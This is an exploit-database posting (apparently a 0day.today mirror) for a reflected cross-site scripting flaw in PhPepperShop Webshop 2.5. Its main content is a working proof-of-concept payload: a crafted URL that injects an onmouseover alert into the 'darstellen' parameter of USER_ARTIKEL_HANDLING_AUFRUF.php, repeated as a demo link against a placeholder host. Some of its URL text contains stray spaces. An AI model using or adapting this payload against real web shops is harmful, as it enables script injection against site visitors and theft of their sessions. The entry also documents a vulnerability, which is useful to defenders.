PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability

2010-02-27T00:00:00
ID 1337DAY-ID-11115
Type zdt
Reporter Crux
Modified 2010-02-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability
=================================================================

================================================== ============================
[~] PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability
================================================== ============================
[+] My home [ http://hack-tech.com ]
[+] Date Submitted: [ January 12 2010 ]
[+] Founder: [ Crux ]
[+] Vendor: [ Webshop Software PhPepperShop - das professionelle Shopsystem ]
[+] Version: [ 2.5.1 ]
[+] Greetz: [ HT Team, All maldivians and my love ]
[+] Dork: [ NO NO NO! ]
################################################## #############################

[ EXPLOIT ]

[Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+on mouseover%3Dalert(411780276689)+&lowlimit=0&highli mit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PE PPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h =971


[ DEMO ]

http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+on mouseover%3Dalert(411780276689)+&lowlimit=0&highli mit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PE PPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h =971



#  0day.today [2018-01-02]  #